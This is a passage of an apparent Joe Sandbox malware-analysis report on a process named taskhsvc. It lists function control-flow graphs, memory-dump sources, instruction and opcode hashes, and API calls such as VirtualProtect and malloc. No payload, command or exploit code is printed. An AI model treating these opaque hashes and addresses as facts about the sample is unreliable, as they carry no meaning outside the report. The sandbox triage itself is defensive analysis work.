                                                            • Instruction Fuzzy Hash: C7315EB2A05342CFE710DF68D98461AFBF5BB45354F56891CD9A8C7660E730E844CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CD6C940 Relevance: 4.6, APIs: 3, Instructions: 148COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 899 6cd6c940-6cd6c974 900 6cd6c976-6cd6c97a 899->900 901 6cd6c9a0-6cd6c9b4 899->901 904 6cd6ca30-6cd6ca50 900->904 905 6cd6c980-6cd6c985 900->905 902 6cd6c8e0-6cd6c908 malloc 901->902 903 6cd6c9ba-6cd6c9bf 901->903 902->903 910 6cd6c90e-6cd6c919 902->910 906 6cd6c9c1-6cd6c9d9 903->906 907 6cd6c9dc-6cd6c9de 903->907 908 6cd6ca87-6cd6ca9a 904->908 909 6cd6ca52-6cd6ca54 904->909 905->904 911 6cd6c98b-6cd6c990 905->911 906->907 912 6cd6c9e4-6cd6ca08 memcpy 907->912 913 6cd6d965-6cd6d985 memcpy 907->913 915 6cd6d890-6cd6d893 908->915 916 6cd6caa0-6cd6caa3 908->916 909->908 914 6cd6ca56-6cd6ca66 909->914 917 6cd6c920-6cd6c92d 910->917 911->901 918 6cd6c992-6cd6c995 911->918 919 6cd6d9b1-6cd6d9d0 memcpy 912->919 920 6cd6ca0e-6cd6ca1b 912->920 928 6cd6d9a5 913->928 921 6cd6d930-6cd6d941 adler32 914->921 922 6cd6ca6c-6cd6ca84 crc32 914->922 915->921 923 6cd6caa5-6cd6caaa 916->923 924 6cd6caac 916->924 925 6cd6c933-6cd6c93d 917->925 926 6cd6e711-6cd6e71a __stack_chk_fail 917->926 918->904 927 6cd6c99b-6cd6c99c 918->927 919->926 920->928 929 6cd6ca21-6cd6ca26 920->929 922->908 923->924 931 6cd6cab1-6cd6cabc 923->931 924->931 927->901 928->919 929->904 932 6cd6ca28-6cd6ca2d 929->932 933 6cd6cabe-6cd6cac7 931->933 934 6cd6cacd-6cd6cadb 931->934 932->904 933->917 933->934
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            • Associated: 00000056.00000002.3023161276.000000006CD60000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023343760.000000006CD6D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023521855.000000006CD73000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023571526.000000006CD75000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023653880.000000006CD7C000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023693853.000000006CD7D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023790951.000000006CD81000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: crc32memcpy
                                                            • String ID:
                                                            • API String ID: 1641957252-0
                                                            • Opcode ID: 2ba23e12acea9caf1e4cbd4d21260fb6a82aff79273833d0305100f1a7d0390a
                                                            • Instruction ID: 2e116107d20f8336d7ff76a5c24459ef4febc2506871dae6a1bd9adf22fd155b
                                                            • Opcode Fuzzy Hash: 2ba23e12acea9caf1e4cbd4d21260fb6a82aff79273833d0305100f1a7d0390a
                                                            • Instruction Fuzzy Hash: 225102756157018FD754DF2AC180A1ABBF0BF88358F649A2EE99A87F61D730E840CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF94C20 Relevance: 3.2, APIs: 2, Instructions: 196COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1049 6cf94c20-6cf94c27 1050 6cf94c29 1049->1050 1051 6cf94c30-6cf94c82 call 6cf954c0 call 6cf956e0 1049->1051 1056 6cf94c88-6cf94c8b 1051->1056 1057 6cf94d23-6cf94d2a 1051->1057 1058 6cf94c91-6cf94c98 1056->1058 1059 6cf94df0 1056->1059 1061 6cf94d2b 1058->1061 1062 6cf94c9e-6cf94ca5 1058->1062 1060 6cf94df5-6cf94df9 1059->1060 1063 6cf94dff-6cf94e04 1060->1063 1064 6cf94d30-6cf94d36 1060->1064 1061->1064 1062->1061 1065 6cf94cab-6cf94cb8 1062->1065 1067 6cf94e0a 1063->1067 1068 6cf94cc3-6cf94cc9 1063->1068 1064->1057 1069 6cf94d38-6cf94d39 1064->1069 1065->1060 1066 6cf94cbe 1065->1066 1066->1068 1067->1064 1070 6cf94ebb-6cf94ed9 call 6cf94a80 1068->1070 1071 6cf94ccf-6cf94cd8 1068->1071 1072 6cf94d40-6cf94d65 call 6cf94ae0 1069->1072 1082 6cf94edb-6cf94ede 1070->1082 1083 6cf94efa 1070->1083 1071->1057 1073 6cf94cda-6cf94cfb 1071->1073 1085 6cf94d67-6cf94d70 1072->1085 1076 6cf94e0f-6cf94e3d call 6cf94ae0 1073->1076 1077 6cf94d01-6cf94d04 1073->1077 1097 6cf94e44-6cf94e4d 1076->1097 1080 6cf94d0a-6cf94d0d 1077->1080 1081 6cf94e7f-6cf94e94 call 6cf94ae0 1077->1081 1089 6cf94e58-6cf94e7d call 6cf94ae0 1080->1089 1090 6cf94d13-6cf94d1e call 6cf94a80 1080->1090 1081->1097 1091 6cf94ee0-6cf94ef5 1082->1091 1086 6cf94d7f-6cf94d94 1085->1086 1087 6cf94d72 1085->1087 1093 6cf94d74-6cf94d7d 1086->1093 1094 6cf94d96-6cf94db6 VirtualQuery 1086->1094 1087->1057 1089->1097 1090->1057 1105 6cf94ef7 1091->1105 1093->1057 1093->1086 1100 6cf94dbc-6cf94de5 VirtualProtect 1094->1100 1101 6cf94e96-6cf94eb6 call 6cf94a80 1094->1101 1097->1073 1103 6cf94e53 1097->1103 1100->1093 1101->1070 1103->1085 1105->1083
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce9f8a3375641176944ea95fd28b394a296c41d2577f036d9272f3bd0803ab7b
                                                            • Instruction ID: e3f0dd105862e24edfa8191b679c29f658add9d67136313941cc20c5eedbf269
                                                            • Opcode Fuzzy Hash: ce9f8a3375641176944ea95fd28b394a296c41d2577f036d9272f3bd0803ab7b
                                                            • Instruction Fuzzy Hash: 6F71D036A052118FEF04EF68D480B8ABBF1FB96304F14855AE864CBB24DB34E945CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CD72870 Relevance: 3.2, APIs: 2, Instructions: 196COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 935 6cd72870-6cd72877 936 6cd72880-6cd728d2 call 6cd73110 call 6cd73320 935->936 937 6cd72879 935->937 942 6cd72973-6cd7297a 936->942 943 6cd728d8-6cd728db 936->943 944 6cd728e1-6cd728e8 943->944 945 6cd72a40 943->945 947 6cd728ee-6cd728f5 944->947 948 6cd7297b 944->948 946 6cd72a45-6cd72a49 945->946 949 6cd72980-6cd72986 946->949 950 6cd72a4f-6cd72a54 946->950 947->948 951 6cd728fb-6cd72908 947->951 948->949 949->942 955 6cd72988-6cd72989 949->955 953 6cd72913-6cd72919 950->953 954 6cd72a5a 950->954 951->946 952 6cd7290e 951->952 952->953 956 6cd7291f-6cd72928 953->956 957 6cd72b0b-6cd72b29 call 6cd726d0 953->957 954->949 958 6cd72990-6cd729b5 call 6cd72730 955->958 956->942 959 6cd7292a-6cd7294b 956->959 968 6cd72b2b-6cd72b2e 957->968 969 6cd72b4a 957->969 971 6cd729b7-6cd729c0 958->971 962 6cd72951-6cd72954 959->962 963 6cd72a5f-6cd72a8d call 6cd72730 959->963 966 6cd72acf-6cd72ae4 call 6cd72730 962->966 967 6cd7295a-6cd7295d 962->967 983 6cd72a94-6cd72a9d 963->983 966->983 975 6cd72963-6cd7296e call 6cd726d0 967->975 976 6cd72aa8-6cd72acd call 6cd72730 967->976 977 6cd72b30-6cd72b45 968->977 972 6cd729c2 971->972 973 6cd729cf-6cd729e4 971->973 972->942 979 6cd729e6-6cd72a06 VirtualQuery 973->979 980 6cd729c4-6cd729cd 973->980 975->942 976->983 991 6cd72b47 977->991 986 6cd72ae6-6cd72b06 call 6cd726d0 979->986 987 6cd72a0c-6cd72a35 VirtualProtect 979->987 980->942 980->973 983->959 989 6cd72aa3 983->989 986->957 987->980 989->971 991->969
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            • Associated: 00000056.00000002.3023161276.000000006CD60000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023343760.000000006CD6D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023521855.000000006CD73000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023571526.000000006CD75000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023653880.000000006CD7C000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023693853.000000006CD7D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023790951.000000006CD81000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8607c764cd3e98720aee56a0579b0a3d2c9cf6f661282d9fc2573d7fd6ab87f
                                                            • Instruction ID: 4645ac4540d316f7c76eae60601b327f0b4a2528dd0a2bf196272c720e0932a8
                                                            • Opcode Fuzzy Hash: a8607c764cd3e98720aee56a0579b0a3d2c9cf6f661282d9fc2573d7fd6ab87f
                                                            • Instruction Fuzzy Hash: A371BD72A05295DFDB21DF29C58864D77F5FF46318F188419D8888B724E734E905CBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CDDFF00 Relevance: 3.2, APIs: 2, Instructions: 196COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 992 6cddff00-6cddff07 993 6cddff09 992->993 994 6cddff10-6cddff62 call 6cde07a0 call 6cde09c0 992->994 999 6cddff68-6cddff6b 994->999 1000 6cde0003-6cde000a 994->1000 1001 6cddff71-6cddff78 999->1001 1002 6cde00d0 999->1002 1003 6cddff7e-6cddff85 1001->1003 1004 6cde000b 1001->1004 1005 6cde00d5-6cde00d9 1002->1005 1003->1004 1006 6cddff8b-6cddff98 1003->1006 1007 6cde0010-6cde0016 1004->1007 1005->1007 1008 6cde00df-6cde00e4 1005->1008 1006->1005 1009 6cddff9e 1006->1009 1007->1000 1010 6cde0018-6cde0019 1007->1010 1011 6cde00ea 1008->1011 1012 6cddffa3-6cddffa9 1008->1012 1009->1012 1015 6cde0020-6cde0045 call 6cddfdc0 1010->1015 1011->1007 1013 6cddffaf-6cddffb8 1012->1013 1014 6cde019b-6cde01b9 call 6cddfd60 1012->1014 1013->1000 1016 6cddffba-6cddffdb 1013->1016 1025 6cde01da 1014->1025 1026 6cde01bb-6cde01be 1014->1026 1027 6cde0047-6cde0050 1015->1027 1019 6cde00ef-6cde011d call 6cddfdc0 1016->1019 1020 6cddffe1-6cddffe4 1016->1020 1040 6cde0124-6cde012d 1019->1040 1023 6cde015f-6cde0174 call 6cddfdc0 1020->1023 1024 6cddffea-6cddffed 1020->1024 1023->1040 1030 6cde0138-6cde015d call 6cddfdc0 1024->1030 1031 6cddfff3-6cddfff7 1024->1031 1032 6cde01c0-6cde01d5 1026->1032 1033 6cde005f-6cde0074 1027->1033 1034 6cde0052 1027->1034 1030->1040 1031->1000 1039 6cddfffe call 6cddfd60 1031->1039 1048 6cde01d7 1032->1048 1037 6cde0076-6cde0096 VirtualQuery 1033->1037 1038 6cde0054-6cde005d 1033->1038 1034->1000 1043 6cde009c-6cde00c5 VirtualProtect 1037->1043 1044 6cde0176-6cde0196 call 6cddfd60 1037->1044 1038->1000 1038->1033 1039->1000 1040->1016 1046 6cde0133 1040->1046 1043->1002 1043->1038 1044->1014 1046->1027 1048->1025
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3024614703.000000006CDDF000.00000080.00000001.01000000.00000010.sdmp, Offset: 6CD90000, based on PE: true
                                                            • Associated: 00000056.00000002.3023841714.000000006CD90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023887330.000000006CD91000.00000020.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024463758.000000006CDD9000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024551715.000000006CDDA000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024678605.000000006CDE1000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024722441.000000006CDE2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024765426.000000006CDE4000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024900460.000000006CDF2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3024956621.000000006CDF3000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025050954.000000006CDF6000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025101418.000000006CDF7000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025101418.000000006CDFC000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025204010.000000006CDFD000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd90000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ce51e0c7508d101cf3c537e368537d1d0a0a1ac9bd94475b85ee06fe8e1092d1
                                                            • Instruction ID: 1de30f3bd6e6ccae68510644537aab1ad24c52be1e6b30b99545e636f0406121
                                                            • Opcode Fuzzy Hash: ce51e0c7508d101cf3c537e368537d1d0a0a1ac9bd94475b85ee06fe8e1092d1
                                                            • Instruction Fuzzy Hash: 0471D076A05281CFDB10DF28D98065977F6FB8E348F19881AE958CB724DB31F845CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CD6BE90 Relevance: 3.1, APIs: 2, Instructions: 106COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1106 6cd6be90-6cd6beb3 1107 6cd6c060-6cd6c065 1106->1107 1108 6cd6beb9-6cd6bebc 1106->1108 1110 6cd6bfd5-6cd6bfdf 1107->1110 1108->1107 1109 6cd6bec2-6cd6bec5 1108->1109 1109->1107 1111 6cd6becb-6cd6becd 1109->1111 1112 6cd6bfe5-6cd6bfea 1110->1112 1113 6cd6c07a-6cd6c07f __stack_chk_fail 1110->1113 1114 6cd6c014-6cd6c019 1111->1114 1115 6cd6bed3-6cd6bedf 1111->1115 1114->1110 1116 6cd6c020-6cd6c024 1114->1116 1117 6cd6bee5-6cd6beed 1115->1117 1118 6cd6c040-6cd6c055 1115->1118 1121 6cd6bf35-6cd6bf3b 1116->1121 1119 6cd6bef3-6cd6bf0a malloc 1117->1119 1120 6cd6c030-6cd6c037 1117->1120 1124 6cd6c070-6cd6c075 1119->1124 1125 6cd6bf10-6cd6bf1c 1119->1125 1122 6cd6bf45-6cd6bf7e 1121->1122 1123 6cd6bf3d-6cd6bf3f 1121->1123 1127 6cd6bff0-6cd6bff6 1122->1127 1128 6cd6bf80-6cd6bfd3 1122->1128 1123->1122 1126 6cd6c000-6cd6c00d 1123->1126 1124->1110 1125->1116 1129 6cd6bf22-6cd6bf32 1125->1129 1126->1114 1127->1128 1128->1110 1129->1121
                                                            APIs
                                                            • malloc.MSVCRT(?,?,?,?,?,00000000,?,6CD679AA), ref: 6CD6BF06
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3023203273.000000006CD61000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CD60000, based on PE: true
                                                            • Associated: 00000056.00000002.3023161276.000000006CD60000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023343760.000000006CD6D000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023442567.000000006CD6E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023521855.000000006CD73000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023571526.000000006CD75000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023653880.000000006CD7C000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023693853.000000006CD7D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023741238.000000006CD80000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                            • Associated: 00000056.00000002.3023790951.000000006CD81000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6cd60000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: malloc
                                                            • String ID:
                                                            • API String ID: 2803490479-0
                                                            • Opcode ID: fe6dac43cd36d1771101da4a710d3d17dabb77855c96145c1d65dfcd445b41f4
                                                            • Instruction ID: a56299b9303a6d6c356ffae624da3b2a41067384730bfbe4262fce272e31c871
                                                            • Opcode Fuzzy Hash: fe6dac43cd36d1771101da4a710d3d17dabb77855c96145c1d65dfcd445b41f4
                                                            • Instruction Fuzzy Hash: CB4116B0509240CFEB44CF1AC5987467BE0BF89328F16929DE8944FBA6D775C844CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE2347A Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1146 6ce2347a-6ce2347c 1147 6ce23482-6ce23489 1146->1147 1148 6ce235b0-6ce235b2 1146->1148 1150 6ce2348b-6ce234a7 1147->1150 1151 6ce234ac-6ce234c9 realloc 1147->1151 1149 6ce234f0-6ce23507 1148->1149 1150->1151 1151->1149 1153 6ce234cb-6ce234ec 1151->1153 1153->1149
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: realloc
                                                            • String ID:
                                                            • API String ID: 471065373-0
                                                            • Opcode ID: 72d17f84b20e5f282aa748ca403f481a757fac0fa0650571f1c7a9670886f1bd
                                                            • Instruction ID: bf83a206ed1202ec6ef6c0c92f76ef93689f7cb6be8af36345c8e2312df23e10
                                                            • Opcode Fuzzy Hash: 72d17f84b20e5f282aa748ca403f481a757fac0fa0650571f1c7a9670886f1bd
                                                            • Instruction Fuzzy Hash: DA018CB0A097019FD740DF1AD08031AFBF8BFD8758F55C91EE4A987210D77995458F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 6CEC2C90 Relevance: 128.3, APIs: 72, Strings: 1, Instructions: 584COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CONF_module_add.LIBEAY32 ref: 6CEC2CB5
                                                              • Part of subcall function 6CF61EF0: CRYPTO_malloc.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF285EA), ref: 6CF61F32
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CEC2CCA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
